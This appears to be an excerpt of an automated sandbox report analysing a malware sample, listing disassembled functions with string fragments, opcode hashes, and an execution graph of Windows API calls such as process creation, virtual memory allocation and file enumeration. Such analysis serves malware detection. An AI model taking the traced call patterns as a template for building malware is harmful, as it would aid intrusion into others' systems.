                                                    Function 025123D9 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$P$e$i$m$o$r$x
                                                    • API String ID: 0-620024284
                                                    • Opcode ID: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                    • Instruction ID: 04f89fcb8e6174aef0809f8fab6a7df07c0ac9b28e0659eb8f1578d181341eb9
                                                    • Opcode Fuzzy Hash: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                    • Instruction Fuzzy Hash: 4C4164B5800228B6DB20EBA5DC44FEEB779AF99300F0085D9A509A71C0EAB55758CFA5
                                                    Function 024FFADA Relevance: 10.1, Strings: 8, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4$XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                    • API String ID: 0-2821098887
                                                    • Opcode ID: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                    • Instruction ID: 2525db471170179e29dfd1a7286b8affdf56d0e2ed1f9b14d0145df53db871bf
                                                    • Opcode Fuzzy Hash: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                    • Instruction Fuzzy Hash: 4A31DDB0C0129CAADB15CFA5DA8868DBFB0FB04748F618659C42A7F250D7318A46CF56
                                                    Function 0250358D Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$9$E$\$]$k$v${
                                                    • API String ID: 0-2353787348
                                                    • Opcode ID: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                    • Instruction ID: 53a5b74e6edabaccffbbb8babe303c7124edaeb927e5dac6397c59916098694a
                                                    • Opcode Fuzzy Hash: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                    • Instruction Fuzzy Hash: 1211D810D087CADDDB12C7BC88596AEBF715F23224F0882D9D4A52B2D2C2794746C7A6
                                                    Function 0251F46D Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L$S$\$a$c$e$l
                                                    • API String ID: 0-3322591375
                                                    • Opcode ID: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                    • Instruction ID: f007d86cdc96ba2a3706748d1893200da6848b512154394482bd1223d92f986c
                                                    • Opcode Fuzzy Hash: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                    • Instruction Fuzzy Hash: 384183B2C00218ABDB10DFA9DC84AEEB7F9BF89304F05469AD919A7140E7715A85CF94
                                                    Function 02517058 Relevance: 7.7, Strings: 6, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: F$P$T$f$r$x
                                                    • API String ID: 0-2523166886
                                                    • Opcode ID: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                    • Instruction ID: 3b928b4e3e7ba4c45cffcd4d11c685aa6f355a1497e89c1b2818fcb045fee433
                                                    • Opcode Fuzzy Hash: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                    • Instruction Fuzzy Hash: 3451F371940316ABEB34DFA8CC44BAAF7F8FF49344F00065EA518561C0E7B5A689CFA5
                                                    Function 0251676D Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $i$l$o$u
                                                    • API String ID: 0-2051669658
                                                    • Opcode ID: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                    • Instruction ID: 3b192ef28d9f430db9c4eaa7d8c2f1a2d056d5543c94930ce15f4dc507e018ce
                                                    • Opcode Fuzzy Hash: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                    • Instruction Fuzzy Hash: 2D6160B1900304AFDB24DBA4CC80FEFBBFDBB88710F104959E559A7240E775AA45CB65
                                                    Function 025162BB Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-1319493415
                                                    • Opcode ID: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                    • Instruction ID: 69bb09f4fe3a2e5c3ab076b7dc334e913341d16d7182ce5b603904c985578189
                                                    • Opcode Fuzzy Hash: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                    • Instruction Fuzzy Hash: EE416DB19112297AEB01DB91CC41FEFB77DAF8A710F004149F6146A1C1E7746749CBAA
                                                    Function 025162BD Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-1319493415
                                                    • Opcode ID: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                    • Instruction ID: 0da8a0e66df4ef3b809ccc43f6d8a8d5281feb56be7385fde493d078a7cddd69
                                                    • Opcode Fuzzy Hash: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                    • Instruction Fuzzy Hash: EF314FB19111297AEB01EB95CC41FEFB77DEF8A710F004049F6146A1C1E7746B458BAA
                                                    Function 025163FA Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    • Opcode ID: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                    • Instruction ID: 4e3fce62224a4a31c8a278f6f60dc861a5fd88988cc60d9eff1bd6f3ce882d4e
                                                    • Opcode Fuzzy Hash: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                    • Instruction Fuzzy Hash: 47B10AB5A00705AFDB24DFA4C885FEFB7BDAF88704F108558E619A7280D775AA41CB50
                                                    Function 02516D36 Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    • Opcode ID: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                    • Instruction ID: 0b20bbc74bc150437515dc44de12284d69ae2889dbf4ef088e58834b90b94477
                                                    • Opcode Fuzzy Hash: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                    • Instruction Fuzzy Hash: 2F8155B2C002696ADB15EB54CD84FEFB37DBF8D300F0045DAA50966180EB746B48CFA9
                                                    Function 025163FD Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    • Opcode ID: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                    • Instruction ID: ba308e9cbb82329d162d95bb5ead6c43304dc51adc16c36f5c70409cf2d93c41
                                                    • Opcode Fuzzy Hash: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                    • Instruction Fuzzy Hash: D9612CB5A00709AFDB64DFA4CC84FEFB7BDAF88704F108558E65997284D731AA41CB60
                                                    Function 02516D3D Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    • Opcode ID: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                    • Instruction ID: 3372f7b9b25113b00b73a6c5358fd9f1e5ad2accb925192b187b870495c83685
                                                    • Opcode Fuzzy Hash: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                    • Instruction Fuzzy Hash: 3B414471C01369AADB15EBA4CD44FDEB3B9AF4C700F0045DA9509A6181EB746B88CFA9
                                                    Function 025125BD Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$U$g$r
                                                    • API String ID: 0-389700855
                                                    • Opcode ID: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                    • Instruction ID: 26ed47bfd287a02facf6fd2128ec80fe8451a90d605da4a1925e90f3ab487676
                                                    • Opcode Fuzzy Hash: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                    • Instruction Fuzzy Hash: B83134B1910119ABEB04DBA4CD45BEE77F9FF49304F004198E908A72C0FB75AA448BE9

                                                    Execution Graph

                                                    Execution Coverage:2.9%
                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                    Signature Coverage:2.2%
                                                    Total number of Nodes:445
                                                    Total number of Limit Nodes:70
                                                    execution_graph 87573 973553 87574 978180 2 API calls 87573->87574 87575 973563 87574->87575 87576 989780 NtClose 87575->87576 87577 97357f 87575->87577 87576->87577 87578 9726d0 87579 988e30 LdrInitializeThunk 87578->87579 87580 972706 87579->87580 87583 989810 87580->87583 87582 97271b 87584 98989f 87583->87584 87586 98983b 87583->87586 87588 3472e80 LdrInitializeThunk 87584->87588 87585 9898cd 87585->87582 87586->87582 87588->87585 87589 975fd0 87590 978500 LdrInitializeThunk 87589->87590 87593 976000 87590->87593 87592 97604a 87593->87592 87594 97602c 87593->87594 87595 978480 87593->87595 87596 9784c4 87595->87596 87601 9784e5 87596->87601 87602 988b00 87596->87602 87598 9784f1 87598->87593 87599 9784d5 87599->87598 87600 989780 NtClose 87599->87600 87600->87601 87601->87593 87603 988b2b 87602->87603 87604 988b7d 87602->87604 87603->87599 87607 3474650 LdrInitializeThunk 87604->87607 87605 988b9f 87605->87599 87607->87605 87608 97c9d0 87610 97c9f9 87608->87610 87609 97cafc 87610->87609 87611 97caa0 FindFirstFileW 87610->87611 87611->87609 87614 97cabb 87611->87614 87612 97cae3 FindNextFileW 87613 97caf5 FindClose 87612->87613 87612->87614 87613->87609 87614->87612 87615 981ed0 87619 981ee9 87615->87619 87616 981f76 87617 981f31 87618 98b7f0 RtlFreeHeap 87617->87618 87620 981f41 87618->87620 87619->87616 87619->87617 87621 981f71 87619->87621 87622 98b7f0 RtlFreeHeap 87621->87622 87622->87616 87628 9816d1 87633 9895f0 87628->87633 87630 9816f2 87631 989780 NtClose 87630->87631 87632 981719 87631->87632 87634 98969a 87633->87634 87636 98961e 87633->87636 87635 9896ad NtReadFile 87634->87635 87635->87630 87636->87630 87237 978c04 87238 978c14 87237->87238 87240 978adf 87238->87240 87241 9774c0 87238->87241 87242 9774d6 87241->87242 87244 97750c 87241->87244 87242->87244 87245 977330 LdrLoadDll 87242->87245 87244->87240 87245->87244 87246 97a001 87247 97a016 87246->87247 87248 97a01b 87246->87248 87249 97a04d 87248->87249 87251 98b7f0 87248->87251 87254 989ad0 87251->87254 87253 98b806 87253->87249 87255 989aea 87254->87255 87256 989af8 RtlFreeHeap 87255->87256 87256->87253 87257 969f80 87258 96a2cb 87257->87258 87260 96a659 87258->87260 87261 98b450 87258->87261 87262 98b476 87261->87262 87267 964230 87262->87267 87264 98b482 87265 98b4bb 87264->87265 87270 985950 87264->87270 87265->87260 87274 973650 87267->87274 87269 96423d 87269->87264 87271 9859b2 87270->87271 87273 9859bf 87271->87273 87292 971e00 87271->87292 87273->87265 87275 97366d 87274->87275 87277 973680 87275->87277 87278 98a1c0 87275->87278 87277->87269 87280 98a1da 87278->87280 87279 98a209 87279->87277 87280->87279 87285 988e30 87280->87285 87283 98b7f0 RtlFreeHeap 87284 98a27f 87283->87284 87284->87277 87286 988e4a 87285->87286 87289 3472c0a 87286->87289 87287 988e73 87287->87283 87290 3472c11 87289->87290 87291 3472c1f LdrInitializeThunk 87289->87291 87290->87287 87291->87287 87293 971e3b 87292->87293 87308 978290 87293->87308 87295 971e43 87296 97211b 87295->87296 87319 98b8d0 87295->87319 87296->87273 87298 971e59 87299 98b8d0 RtlAllocateHeap 87298->87299 87300 971e6a 87299->87300 87301 98b8d0 RtlAllocateHeap 87300->87301 87302 971e7b 87301->87302 87307 971f15 87302->87307 87330 976e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 87302->87330 87305 9720cd 87326 988290 87305->87326 87322 974990 87307->87322 87309 9782bc 87308->87309 87331 978180 87309->87331 87312 978301 87314 97831d 87312->87314 87317 989780 NtClose 87312->87317 87313 9782e9 87315 9782f4 87313->87315 87337 989780 87313->87337 87314->87295 87315->87295 87318 978313 87317->87318 87318->87295 87345 989a90 87319->87345 87321 98b8e8 87321->87298 87323 9749b4 87322->87323 87324 9749bb 87323->87324 87325 9749f7 LdrLoadDll 87323->87325 87324->87305 87325->87324 87327 9882f2 87326->87327 87329 9882ff 87327->87329 87348 972130 87327->87348 87329->87296 87330->87307 87332 97819a 87331->87332 87336 978276 87331->87336 87340 988ec0 87332->87340 87335 989780 NtClose 87335->87336 87336->87312 87336->87313 87338 98979a 87337->87338 87339 9897a8 NtClose 87338->87339 87339->87315 87341 988edd 87340->87341 87344 34735c0 LdrInitializeThunk 87341->87344 87342 97826a 87342->87335 87344->87342 87346 989aaa 87345->87346 87347 989ab8 RtlAllocateHeap 87346->87347 87347->87321 87364 978560 87348->87364 87350 9726b3 87350->87329 87351 972150 87351->87350 87368 981510 87351->87368 87354 972372 87376 98c9c0 87354->87376 87355 9721ae 87355->87350 87371 98c890 87355->87371 87358 972387 87360 9723cb 87358->87360 87382 970c80 87358->87382 87360->87350 87361 970c80 LdrInitializeThunk 87360->87361 87386 978500 87360->87386 87361->87360 87362 972520 87362->87360 87363 978500 LdrInitializeThunk 87362->87363 87363->87362 87365 97856d 87364->87365 87366 978593 87365->87366 87367 97858c SetErrorMode 87365->87367 87366->87351 87367->87366 87390 98b760 87368->87390 87370 981531 87370->87355 87372 98c8a0 87371->87372 87373 98c8a6 87371->87373 87372->87354 87374 98b8d0 RtlAllocateHeap 87373->87374 87375 98c8cc 87374->87375 87375->87354 87377 98c930 87376->87377 87378 98b8d0 RtlAllocateHeap 87377->87378 87379 98c98d 87377->87379 87380 98c96a 87378->87380 87379->87358 87381 98b7f0 RtlFreeHeap 87380->87381 87381->87379 87383 970c91 87382->87383 87397 989a00 87383->87397 87387 978513 87386->87387 87402 988d30 87387->87402 87389 97853e 87389->87360 87393 9898e0 87390->87393 87392 98b791 87392->87370 87394 989978 87393->87394 87396 98990e 87393->87396 87395 98998b NtAllocateVirtualMemory 87394->87395 87395->87392 87396->87392 87398 989a1a 87397->87398 87401 3472c70 LdrInitializeThunk 87398->87401 87399 970ca2 87399->87362 87401->87399 87403 988dae 87402->87403 87405 988d5b 87402->87405 87407 3472dd0 LdrInitializeThunk 87403->87407 87404 988dd0 87404->87389 87405->87389 87407->87404 87408 97fc00 87409 97fc64 87408->87409 87437 9766d0 87409->87437 87411 97fd9e 87412 97fd97 87412->87411 87444 9767e0 87412->87444 87414 97ff43 87415 97fe1a 87415->87414 87416 97ff52 87415->87416 87448 97f9f0 87415->87448 87417 989780 NtClose 87416->87417 87419 97ff5c 87417->87419 87420 97fe56 87420->87416 87421 97fe61 87420->87421 87422 98b8d0 RtlAllocateHeap 87421->87422 87423 97fe8a 87422->87423 87424 97fe93 87423->87424 87425 97fea9 87423->87425 87426 989780 NtClose 87424->87426 87457 97f8e0 CoInitialize 87425->87457 87428 97fe9d 87426->87428 87429 97feb7 87460 989270 87429->87460 87431 97ff32 87432 989780 NtClose 87431->87432 87433 97ff3c 87432->87433 87435 98b7f0 RtlFreeHeap 87433->87435 87434 97fed5 87434->87431 87436 989270 LdrInitializeThunk 87434->87436 87435->87414 87436->87434 87438 976703 87437->87438 87439 976727 87438->87439 87464 989300 87438->87464 87439->87412 87441 989780 NtClose 87443 9767ca 87441->87443 87442 97674a 87442->87439 87442->87441 87443->87412 87445 976805 87444->87445 87469 989130 87445->87469 87449 97fa0c 87448->87449 87450 974990 LdrLoadDll 87449->87450 87452 97fa27 87450->87452 87451 97fa30 87451->87420 87452->87451 87453 974990 LdrLoadDll 87452->87453 87454 97fafb 87453->87454 87455 974990 LdrLoadDll 87454->87455 87456 97fb55 87454->87456 87455->87456 87456->87420 87459 97f945 87457->87459 87458 97f9db CoUninitialize 87458->87429 87459->87458 87461 98928d 87460->87461 87474 3472ba0 LdrInitializeThunk 87461->87474 87462 9892ba 87462->87434 87465 98931a 87464->87465 87468 3472ca0 LdrInitializeThunk 87465->87468 87466 989343 87466->87442 87468->87466 87470 98914a 87469->87470 87473 3472c60 LdrInitializeThunk 87470->87473 87471 976879 87471->87415 87473->87471 87474->87462 87475 3472ad0 LdrInitializeThunk 87637 97b140 87642 97ae50 87637->87642 87639 97b14d 87656 97aac0 87639->87656 87641 97b163 87643 97ae75 87642->87643 87667 978760 87643->87667 87646 97afc3 87646->87639 87648 97afda 87648->87639 87649 97afd1 87649->87648 87651 97b0c7 87649->87651 87686 97a510 87649->87686 87653 97b12a 87651->87653 87695 97a880 87651->87695 87654 98b7f0 RtlFreeHeap 87653->87654 87655 97b131 87654->87655 87655->87639 87657 97aad6 87656->87657 87664 97aae1 87656->87664 87658 98b8d0 RtlAllocateHeap 87657->87658 87658->87664 87659 97ab08 87659->87641 87660 978760 GetFileAttributesW 87660->87664 87661 97ae22 87662 97ae3b 87661->87662 87663 98b7f0 RtlFreeHeap 87661->87663 87662->87641 87663->87662 87664->87659 87664->87660 87664->87661 87665 97a510 RtlFreeHeap 87664->87665 87666 97a880 RtlFreeHeap 87664->87666 87665->87664 87666->87664 87668 97877f 87667->87668 87669 978786 GetFileAttributesW 87668->87669 87670 978791 87668->87670 87669->87670 87670->87646 87671 9836f0 87670->87671 87672 9836fe 87671->87672 87673 983705 87671->87673 87672->87649 87674 974990 LdrLoadDll 87673->87674 87675 983737 87674->87675 87678 983746 87675->87678 87699 9831b0 LdrLoadDll 87675->87699 87677 98b8d0 RtlAllocateHeap 87679 98375f 87677->87679 87678->87677 87682 9838f1 87678->87682 87680 9838e7 87679->87680 87679->87682 87683 98377b 87679->87683 87681 98b7f0 RtlFreeHeap 87680->87681 87680->87682 87681->87682 87682->87649 87683->87682 87684 98b7f0 RtlFreeHeap 87683->87684 87685 9838db 87684->87685 87685->87649 87687 97a536 87686->87687 87700 97df40 87687->87700 87689 97a5a8 87691 97a730 87689->87691 87693 97a5c6 87689->87693 87690 97a715 87690->87649 87691->87690 87692 97a3d0 RtlFreeHeap 87691->87692 87692->87691 87693->87690 87705 97a3d0 87693->87705 87696 97a8a6 87695->87696 87697 97df40 RtlFreeHeap 87696->87697 87698 97a92d 87697->87698 87698->87651 87699->87678 87702 97df64 87700->87702 87701 97df6d 87701->87689 87702->87701 87703 98b7f0 RtlFreeHeap 87702->87703 87704 97dfb0 87703->87704 87704->87689 87706 97a3ed 87705->87706 87709 97dfc0 87706->87709 87708 97a4f3 87708->87693 87710 97dfe4 87709->87710 87711 97e08e 87710->87711 87712 98b7f0 RtlFreeHeap 87710->87712 87711->87708 87712->87711 87713 977540 87714 97755c 87713->87714 87722 9775af 87713->87722 87716 989780 NtClose 87714->87716 87714->87722 87715 9776e7 87719 977577 87716->87719 87718 9776c1 87718->87715 87725 976b30 NtClose LdrInitializeThunk LdrInitializeThunk 87718->87725 87723 976960 NtClose LdrInitializeThunk LdrInitializeThunk 87719->87723 87722->87715 87724 976960 NtClose LdrInitializeThunk LdrInitializeThunk 87722->87724 87723->87722 87724->87718 87725->87715 87476 989480 87477 989537 87476->87477 87479 9894af 87476->87479 87478 98954a NtCreateFile 87477->87478 87480 980500 87481 98051d 87480->87481 87482 974990 LdrLoadDll 87481->87482 87483 980538 87482->87483 87726 9863c0 87727 98641a 87726->87727 87729 986427 87727->87729 87730 983e10 87727->87730 87731 98b760 NtAllocateVirtualMemory 87730->87731 87732 983e51 87731->87732 87733 983f50 87732->87733 87734 974990 LdrLoadDll 87732->87734 87733->87729 87736 983e91 87734->87736 87735 983ed2 Sleep 87735->87736 87736->87733 87736->87735 87737 981b40 87738 981b5c 87737->87738 87739 981b98 87738->87739 87740 981b84 87738->87740 87742 989780 NtClose 87739->87742 87741 989780 NtClose 87740->87741 87743 981b8d 87741->87743 87744 981ba1 87742->87744 87747 98b910 RtlAllocateHeap 87744->87747 87746 981bac 87747->87746 87748 98c8f0 87749 98b7f0 RtlFreeHeap 87748->87749 87750 98c905 87749->87750 87486 972ba5 87487 9766d0 2 API calls 87486->87487 87488 972bd0 87487->87488 87489 969f20 87490 969f2f 87489->87490 87491 969f6d 87490->87491 87492 969f5a CreateThread 87490->87492 87756 96b960 87757 96cfd1 87756->87757 87758 98b760 NtAllocateVirtualMemory 87756->87758 87758->87757 87494 9771a0 87495 9771ca 87494->87495 87498 978330 87495->87498 87497 9771f1 87499 97834d 87498->87499 87505 988f10 87499->87505 87501 97839d 87502 9783a4 87501->87502 87510 988ff0 87501->87510 87502->87497 87504 9783cd 87504->87497 87506 988fab 87505->87506 87507 988f3b 87505->87507 87515 3472f30 LdrInitializeThunk 87506->87515 87507->87501 87508 988fe1 87508->87501 87511 9890a1 87510->87511 87512 98901f 87510->87512 87516 3472d10 LdrInitializeThunk 87511->87516 87512->87504 87513 9890e3 87513->87504 87515->87508 87516->87513 87517 977720 87518 977738 87517->87518 87520 97778f 87517->87520 87518->87520 87521 97b660 87518->87521 87522 97b686 87521->87522 87523 97b8b3 87522->87523 87548 989b50 87522->87548 87523->87520 87525 97b6f9 87525->87523 87526 98c9c0 2 API calls 87525->87526 87527 97b718 87526->87527 87527->87523 87528 97b7ec 87527->87528 87529 988e30 LdrInitializeThunk 87527->87529 87530 975f50 LdrInitializeThunk 87528->87530 87532 97b80b 87528->87532 87531 97b77a 87529->87531 87530->87532 87531->87528 87533 97b783 87531->87533 87547 97b89b 87532->87547 87554 9889a0 87532->87554 87533->87523 87541 97b7b2 87533->87541 87543 97b7d4 87533->87543 87551 975f50 87533->87551 87534 978500 LdrInitializeThunk 87539 97b7e2 87534->87539 87535 978500 LdrInitializeThunk 87540 97b8a9 87535->87540 87539->87520 87540->87520 87569 984ae0 LdrInitializeThunk 87541->87569 87542 97b872 87559 988a50 87542->87559 87543->87534 87545 97b88c 87564 988bb0 87545->87564 87547->87535 87549 989b6d 87548->87549 87550 989b7e CreateProcessInternalW 87549->87550 87550->87525 87552 988ff0 LdrInitializeThunk 87551->87552 87553 975f8b 87552->87553 87553->87541 87555 9889cb 87554->87555 87556 988a1d 87554->87556 87555->87542 87570 34739b0 LdrInitializeThunk 87556->87570 87557 988a3f 87557->87542 87560 988ad0 87559->87560 87562 988a7e 87559->87562 87571 3474340 LdrInitializeThunk 87560->87571 87561 988af2 87561->87545 87562->87545 87565 988bde 87564->87565 87566 988c30 87564->87566 87565->87547 87572 3472fb0 LdrInitializeThunk 87566->87572 87567 988c52 87567->87547 87569->87543 87570->87557 87571->87561 87572->87567 87759 9711e0 87760 9711fa 87759->87760 87761 974990 LdrLoadDll 87760->87761 87762 971215 87761->87762 87763 97125a 87762->87763 87764 971249 PostThreadMessageW 87762->87764 87764->87763 87765 9896e0 87766 989757 87765->87766 87768 98970b 87765->87768 87767 98976a NtDeleteFile 87766->87767 87769 988c60 87770 988cf2 87769->87770 87772 988c8e 87769->87772 87774 3472ee0 LdrInitializeThunk 87770->87774 87771 988d20 87774->87771 87775 988de0 87776 988dfa 87775->87776 87779 3472df0 LdrInitializeThunk 87776->87779 87777 988e1f 87779->87777 87780 97276c 87781 972702 87780->87781 87782 97271b 87781->87782 87783 989810 LdrInitializeThunk 87781->87783 87783->87782

                                                    Executed Functions

                                                    Function 00969F80 Relevance: 26.7, Strings: 21, Instructions: 431COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
